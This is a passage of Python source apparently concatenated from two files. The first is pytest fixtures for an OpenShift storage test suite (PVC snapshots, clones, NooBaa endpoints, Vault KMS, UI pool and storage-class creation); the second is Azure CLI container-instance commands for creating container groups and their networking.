"""
Delete the PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
Snapshot restore factory. Calling this fixture creates set of new PVC out of the
each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
snapshot_obj (list): List OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List of restored PVC object
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
restored_pvc.snapshot = snapshot_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
This fixture collects ocs logs after tier execution and this will allow
to see the cluster's status after the execution on all execution status options.
"""
def finalizer():
"""
Tracking both logs separately reduce changes of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
Get the number of ready nooobaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# prior to 4.6 we configured the ep count directly on the noobaa cr.
if version.get_semantic_ocs_version_from_config() < version.VERSION_4_6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
namespace=pvc_obj.namespace,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if config.REPORTING.get("rp_launch_url"):
request.config._metadata["RP Launch URL:"] = config.REPORTING["rp_launch_url"]
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
Calling this fixture creates clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
pvc_obj (list): List PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List PVC instance
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clone of postgres PVC
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): Resize/Expand the pvc size
pgsql (obj): Pgsql obj
Returns:
Postgres pod: Pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
# Attach a new pgsql pod cloned pvcs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
# Attach a new pgsql pod restored pvcs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def es(request):
"""
Create In-cluster elastic-search deployment for benchmark-operator tests.
using the name es - as shortcut for elastic-search for simplicity
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="session")
def setup_ui_session(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="class")
def setup_ui_class(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="function")
def setup_ui(request):
return setup_ui_fixture(request)
def setup_ui_fixture(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
This fixture tries to load cluster_info.json file if exists (on cluster
installed via Flexy) and apply the information to the config object (for
example related to disconnected cluster)
"""
load_cluster_info()
@pytest.fixture(scope="function")
def pv_encryption_kms_setup_factory(request):
"""
Create vault resources and setup csi-kms-connection-details configMap
"""
vault = KMS.Vault()
def factory(kv_version):
"""
Args:
kv_version(str): KV version to be used, either v1 or v2
Returns:
object: Vault(KMS) object
"""
vault.gather_init_vault_conf()
vault.update_vault_env_vars()
# Check if cert secrets already exist, if not create cert resources
ocp_obj = OCP(kind="secret", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(resource_name="ocs-kms-ca-secret", column="NAME")
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.create_ocs_vault_cert_resources()
# Create vault namespace, backend path and policy in vault
vault_resource_name = create_unique_resource_name("test", "vault")
vault.vault_create_namespace(namespace=vault_resource_name)
vault.vault_create_backend_path(
backend_path=vault_resource_name, kv_version=kv_version
)
vault.vault_create_policy(policy_name=vault_resource_name)
# If csi-kms-connection-details exists, edit the configmap to add new vault config
ocp_obj = OCP(kind="configmap", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(
resource_name="csi-kms-connection-details", column="NAME"
)
new_kmsid = vault_resource_name
vdict = defaults.VAULT_CSI_CONNECTION_CONF
for key in vdict.keys():
old_key = key
vdict[new_kmsid] = vdict.pop(old_key)
vdict[new_kmsid]["VAULT_BACKEND_PATH"] = vault_resource_name
vdict[new_kmsid]["VAULT_NAMESPACE"] = vault_resource_name
vault.kmsid = vault_resource_name
if kv_version == "v1":
vdict[new_kmsid]["VAULT_BACKEND"] = "kv"
else:
vdict[new_kmsid]["VAULT_BACKEND"] = "kv-v2"
KMS.update_csi_kms_vault_connection_details(vdict)
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.kmsid = "1-vault"
vault.create_vault_csi_kms_connection_details(kv_version=kv_version)
return vault
def finalizer():
"""
Remove the vault config from csi-kms-connection-details configMap
"""
if len(KMS.get_encryption_kmsid()) > 1:
KMS.remove_kmsid(vault.kmsid)
# Delete the resources in vault
vault.remove_vault_backend_path()
vault.remove_vault_policy()
vault.remove_vault_namespace()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def cephblockpool_factory_ui_class(request, setup_ui_class):
return cephblockpool_factory_ui_fixture(request, setup_ui_class)
@pytest.fixture(scope="session")
def cephblockpool_factory_ui_session(request, setup_ui_session):
return cephblockpool_factory_ui_fixture(request, setup_ui_session)
@pytest.fixture(scope="function")
def cephblockpool_factory_ui(request, setup_ui):
return cephblockpool_factory_ui_fixture(request, setup_ui)
def cephblockpool_factory_ui_fixture(request, setup_ui):
"""
This funcion create new cephblockpool
"""
instances = []
def factory(
replica=3,
compression=False,
):
"""
Args:
replica (int): size of pool 2,3 supported for now
compression (bool): True to enable compression otherwise False
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the CephBlockPool.
"""
blockpool_ui_object = BlockPoolUI(setup_ui)
pool_name, pool_status = blockpool_ui_object.create_pool(
replica=replica, compression=compression
)
if pool_status:
log.info(
f"Pool {pool_name} with replica {replica} and compression {compression} was created and "
f"is in ready state"
)
ocs_blockpool_obj = create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL,
resource_name=pool_name,
)
instances.append(ocs_blockpool_obj)
return ocs_blockpool_obj
else:
blockpool_ui_object.take_screenshot()
if pool_name:
instances.append(
create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL, resource_name=pool_name
)
)
raise PoolDidNotReachReadyState(
f"Pool {pool_name} with replica {replica} and compression {compression}"
f" did not reach ready state"
)
def finalizer():
"""
Delete the cephblockpool from ui and if fails from cli
"""
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Pool is already deleted")
continue
blockpool_ui_obj = BlockPoolUI(setup_ui)
if not blockpool_ui_obj.delete_pool(instance.name):
instance.delete()
raise PoolNotDeletedFromUI(
f"Could not delete block pool {instances.name} from UI."
f" Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_ui_class(
request, cephblockpool_factory_ui_class, setup_ui_class
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_class, setup_ui_class
)
@pytest.fixture(scope="session")
def storageclass_factory_ui_session(
request, cephblockpool_factory_ui_session, setup_ui_session
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_session, setup_ui_session
)
@pytest.fixture(scope="function")
def storageclass_factory_ui(request, cephblockpool_factory_ui, setup_ui):
return storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui)
def storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui):
"""
The function create new storageclass
"""
instances = []
def factory(
provisioner=constants.OCS_PROVISIONERS[0],
compression=False,
replica=3,
create_new_pool=False,
encryption=False, # not implemented yet
reclaim_policy=constants.RECLAIM_POLICY_DELETE, # not implemented yet
default_pool=constants.DEFAULT_BLOCKPOOL,
existing_pool=None,
):
"""
Args:
provisioner (str): The name of the provisioner. Default is openshift-storage.rbd.csi.ceph.com
compression (bool): if create_new_pool is True, compression will be set if True.
replica (int): if create_new_pool is True, replica will be set.
create_new_pool (bool): True to create new pool with factory.
encryption (bool): enable PV encryption if True.
reclaim_policy (str): Reclaim policy for the storageclass.
existing_pool(str): Use pool name for storageclass.
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the storageclass.
"""
storageclass_ui_object = StorageClassUI(setup_ui)
if existing_pool is None and create_new_pool is False:
pool_name = default_pool
if create_new_pool is True:
pool_ocs_obj = cephblockpool_factory_ui(
replica=replica, compression=compression
)
pool_name = pool_ocs_obj.name
if existing_pool is not None:
pool_name = existing_pool
sc_name = storageclass_ui_object.create_storageclass(pool_name)
if sc_name is None:
log.error("Storageclass was not created")
raise StorageclassNotCreated(
"Storageclass is not found in storageclass list page"
)
else:
log.info(f"Storageclass created with name {sc_name}")
sc_obj = create_ocs_object_from_kind_and_name(
resource_name=sc_name, kind=constants.STORAGECLASS
)
instances.append(sc_obj)
log.info(f"{sc_obj.get()}")
return sc_obj
def finalizer():
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Storageclass is already deleted")
continue
storageclass_ui_obj = StorageClassUI(setup_ui)
if not storageclass_ui_obj.delete_rbd_storage_class(instance.name):
instance.delete()
raise StorageClassNotDeletedFromUI(
f"Could not delete storageclass {instances.name} from UI."
f"Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-few-public-methods,too-many-arguments,no-self-use,too-many-locals,line-too-long,unused-argument
import errno
try:
import msvcrt
except ImportError:
# Not supported for Linux machines.
pass
import platform
import select
import shlex
import signal
import sys
import threading
import time
try:
import termios
import tty
except ImportError:
# Not supported for Windows machines.
pass
import websocket
import yaml
from knack.log import get_logger
from knack.prompting import prompt_pass, prompt, NoTTYException
from knack.util import CLIError
from azure.mgmt.containerinstance.models import (AzureFileVolume, Container, ContainerGroup, ContainerGroupNetworkProtocol,
ContainerPort, ImageRegistryCredential, IpAddress, Port, ResourceRequests,
ResourceRequirements, Volume, VolumeMount, ContainerExecRequestTerminalSize,
GitRepoVolume, LogAnalytics, ContainerGroupDiagnostics, ContainerGroupNetworkProfile,
ContainerGroupIpAddressType)
from azure.cli.core.util import sdk_no_wait
from ._client_factory import cf_container_groups, cf_container, cf_log_analytics, cf_resource, cf_network
logger = get_logger(__name__)
WINDOWS_NAME = 'Windows'
SERVER_DELIMITER = '.'
ACR_SERVER_DELIMITER = '.azurecr.io'
AZURE_FILE_VOLUME_NAME = 'azurefile'
SECRETS_VOLUME_NAME = 'secrets'
GITREPO_VOLUME_NAME = 'gitrepo'
def list_containers(client, resource_group_name=None):
"""List all container groups in a resource group. """
if resource_group_name is None:
return client.list()
return client.list_by_resource_group(resource_group_name)
def get_container(client, resource_group_name, name):
"""Show details of a container group. """
return client.get(resource_group_name, name)
def delete_container(client, resource_group_name, name, **kwargs):
"""Delete a container group. """
return client.delete(resource_group_name, name)
# pylint: disable=too-many-statements
def create_container(cmd,
resource_group_name,
name=None,
image=None,
location=None,
cpu=1,
memory=1.5,
restart_policy='Always',
ports=None,
protocol=None,
os_type='Linux',
ip_address=None,
dns_name_label=None,
command_line=None,
environment_variables=None,
secure_environment_variables=None,
registry_login_server=None,
registry_username=None,
registry_password=None,
azure_file_volume_share_name=None,
azure_file_volume_account_name=None,
azure_file_volume_account_key=None,
azure_file_volume_mount_path=None,
log_analytics_workspace=None,
log_analytics_workspace_key=None,
vnet_name=None,
vnet_address_prefix='10.0.0.0/16',
subnet=None,
subnet_address_prefix='10.0.0.0/24',
network_profile=None,
gitrepo_url=None,
gitrepo_dir='.',
gitrepo_revision=None,
gitrepo_mount_path=None,
secrets=None,
secrets_mount_path=None,
file=None,
no_wait=False):
"""Create a container group. """
if file:
return _create_update_from_file(cmd.cli_ctx, resource_group_name, name, location, file, no_wait)
if not name:
raise CLIError("error: the --name/-n argument is required unless specified with a passed in file.")
if not image:
raise CLIError("error: the --image argument is required unless specified with a passed in file.")
ports = ports or [80]
protocol = protocol or ContainerGroupNetworkProtocol.tcp
container_resource_requirements = _create_resource_requirements(cpu=cpu, memory=memory)
image_registry_credentials = _create_image_registry_credentials(registry_login_server=registry_login_server,
registry_username=registry_username,
registry_password=registry_password,
image=image)
command = shlex.split(command_line) if command_line else None
volumes = []
mounts = []
azure_file_volume = _create_azure_file_volume(azure_file_volume_share_name=azure_file_volume_share_name,
azure_file_volume_account_name=azure_file_volume_account_name,
azure_file_volume_account_key=azure_file_volume_account_key)
azure_file_volume_mount = _create_azure_file_volume_mount(azure_file_volume=azure_file_volume,
azure_file_volume_mount_path=azure_file_volume_mount_path)
if azure_file_volume:
volumes.append(azure_file_volume)
mounts.append(azure_file_volume_mount)
secrets_volume = _create_secrets_volume(secrets)
secrets_volume_mount = _create_secrets_volume_mount(secrets_volume=secrets_volume,
secrets_mount_path=secrets_mount_path)
if secrets_volume:
volumes.append(secrets_volume)
mounts.append(secrets_volume_mount)
diagnostics = None
tags = {}
if log_analytics_workspace and log_analytics_workspace_key:
log_analytics = LogAnalytics(
workspace_id=log_analytics_workspace, workspace_key=log_analytics_workspace_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics
)
elif log_analytics_workspace and not log_analytics_workspace_key:
diagnostics, tags = _get_diagnostics_from_workspace(
cmd.cli_ctx, log_analytics_workspace)
if not diagnostics:
raise CLIError('Log Analytics workspace "' + log_analytics_workspace + '" not found.')
elif not log_analytics_workspace and log_analytics_workspace_key:
raise CLIError('"--log-analytics-workspace-key" requires "--log-analytics-workspace".')
gitrepo_volume = _create_gitrepo_volume(gitrepo_url=gitrepo_url, gitrepo_dir=gitrepo_dir, gitrepo_revision=gitrepo_revision)
gitrepo_volume_mount = _create_gitrepo_volume_mount(gitrepo_volume=gitrepo_volume, gitrepo_mount_path=gitrepo_mount_path)
if gitrepo_volume:
volumes.append(gitrepo_volume)
mounts.append(gitrepo_volume_mount)
# Concatenate secure and standard environment variables
if environment_variables and secure_environment_variables:
environment_variables = environment_variables + secure_environment_variables
else:
environment_variables = environment_variables or secure_environment_variables
# Set up VNET, subnet and network profile if needed
if subnet and vnet_name and not network_profile:
network_profile = _get_vnet_network_profile(cmd, location, resource_group_name, vnet_name, vnet_address_prefix, subnet, subnet_address_prefix)
cg_network_profile = None
if network_profile:
cg_network_profile = ContainerGroupNetworkProfile(id=network_profile)
cgroup_ip_address = _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile)
container = Container(name=name,
image=image,
resources=container_resource_requirements,
command=command,
ports=[ContainerPort(
port=p, protocol=protocol) for p in ports] if cgroup_ip_address else None,
environment_variables=environment_variables,
volume_mounts=mounts or None)
cgroup = ContainerGroup(location=location,
containers=[container],
os_type=os_type,
restart_policy=restart_policy,
ip_address=cgroup_ip_address,
image_registry_credentials=image_registry_credentials,
volumes=volumes or None,
network_profile=cg_network_profile,
diagnostics=diagnostics,
tags=tags)
container_group_client = cf_container_groups(cmd.cli_ctx)
return sdk_no_wait(no_wait, container_group_client.create_or_update, resource_group_name, name, cgroup)
def _get_resource(client, resource_group_name, *subresources):
from msrestazure.azure_exceptions import CloudError
try:
resource = client.get(resource_group_name, *subresources)
return resource
except CloudError as ex:
if ex.error.error == "NotFound" or ex.error.error == "ResourceNotFound":
return None
else:
raise
def _get_vnet_network_profile(cmd, location, resource_group_name, vnet_name, vnet_address_prefix, subnet, subnet_address_prefix):
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id, is_valid_resource_id
containerInstanceDelegationServiceName = "Microsoft.ContainerInstance/containerGroups"
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
aci_delegation = Delegation(
name="Microsoft.ContainerInstance.containerGroups",
service_name="Microsoft.ContainerInstance/containerGroups"
)
ncf = cf_network(cmd.cli_ctx)
subnet_name = subnet
if is_valid_resource_id(subnet):
parsed_subnet_id = parse_resource_id(subnet)
subnet_name = parsed_subnet_id['resource_name']
vnet_name = parsed_subnet_id['name']
default_network_profile_name = "aci-network-profile-{}-{}".format(vnet_name, subnet_name)
subnet = _get_resource(ncf.subnets, resource_group_name, vnet_name, subnet_name)
# For an existing subnet, validate and add delegation if needed
if subnet:
for endpoint in (subnet.service_endpoints or []):
if endpoint.service != "Microsoft.ContainerInstance":
raise CLIError("Can not use subnet with existing service links other than 'Microsoft.ContainerInstance'.")
if not subnet.delegations:
subnet.delegations = [aci_delegation]
else:
for delegation in subnet.delegations:
if delegation.service_name != containerInstanceDelegationServiceName:
raise CLIError("Can not use subnet with existing delegations other than {}".format(containerInstanceDelegationServiceName))
network_profile = _get_resource(ncf.network_profiles, resource_group_name, default_network_profile_name)
if network_profile:
return network_profile.id
# Create new subnet and Vnet if not exists
else:
Subnet, VirtualNetwork, AddressSpace = cmd.get_models('Subnet', 'VirtualNetwork',
'AddressSpace', resource_type=ResourceType.MGMT_NETWORK)
vnet = _get_resource(ncf.virtual_networks, resource_group_name, vnet_name)
if not vnet:
ncf.virtual_networks.create_or_update(resource_group_name,
vnet_name,
VirtualNetwork(name=vnet_name,
location=location,
address_space=AddressSpace(address_prefixes=[vnet_address_prefix])))
subnet = Subnet(
name=subnet_name,
location=location,
address_prefix=subnet_address_prefix,
delegations=[aci_delegation])
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
NetworkProfile, ContainerNetworkInterfaceConfiguration, IPConfigurationProfile = cmd.get_models('NetworkProfile',
'ContainerNetworkInterfaceConfiguration',
'IPConfigurationProfile',
resource_type=ResourceType.MGMT_NETWORK)
# In all cases, create the network profile with aci NIC
network_profile = NetworkProfile(
name=default_network_profile_name,
location=location,
container_network_interface_configurations=[ContainerNetworkInterfaceConfiguration(
name="eth0",
ip_configurations=[IPConfigurationProfile(
name="ipconfigprofile",
subnet=subnet
)]
)]
)
network_profile = ncf.network_profiles.create_or_update(resource_group_name, default_network_profile_name, network_profile).result()
return network_profile.id
def _get_diagnostics_from_workspace(cli_ctx, log_analytics_workspace):
from msrestazure.tools import parse_resource_id
log_analytics_client = cf_log_analytics(cli_ctx)
for workspace in log_analytics_client.list():
if log_analytics_workspace == workspace.name or log_analytics_workspace == workspace.customer_id:
keys = log_analytics_client.get_shared_keys(
parse_resource_id(workspace.id)['resource_group'], workspace.name)
log_analytics = LogAnalytics(
workspace_id=workspace.customer_id, workspace_key=keys.primary_shared_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics)
return (diagnostics, {'oms-resource-link': workspace.id})
return None, {}
def _create_update_from_file(cli_ctx, resource_group_name, name, location, file, no_wait):
resource_client = cf_resource(cli_ctx)
container_group_client = cf_container_groups(cli_ctx)
cg_defintion = None
try:
with open(file, 'r') as f:
cg_defintion = yaml.load(f)
except FileNotFoundError:
raise CLIError("No such file or directory: " + file)
except yaml.YAMLError as e:
raise CLIError("Error while parsing yaml file:\n\n" + str(e))
# Validate names match if both are provided
if name and cg_defintion.get('name', None):
if name != cg_defintion.get('name', None):
raise CLIError("The name parameter and name from yaml definition must match.")
else:
# Validate at least one name is provided
name = name or cg_defintion.get('name', None)
if cg_defintion.get('name', None) is None and not name:
raise CLIError("The name of the container group is required")
cg_defintion['name'] = name
location = location or cg_defintion.get('location', None)
if not location:
location = resource_client.resource_groups.get(resource_group_name).location
cg_defintion['location'] = location
api_version = cg_defintion.get('apiVersion', None) or container_group_client.api_version
return sdk_no_wait(no_wait,
resource_client.resources.create_or_update,
resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
api_version,
cg_defintion)
# pylint: disable=inconsistent-return-statements
def _create_resource_requirements(cpu, memory):
"""Create resource requirements. """
if cpu or memory:
container_resource_requests = ResourceRequests(memory_in_gb=memory, cpu=cpu)
return ResourceRequirements(requests=container_resource_requests)
def _create_image_registry_credentials(registry_login_server, registry_username, registry_password, image):
"""Create image registry credentials. """
image_registry_credentials = None
if registry_login_server:
if not registry_username:
raise CLIError('Please specify --registry-username in order to use custom image registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use custom image registry.')
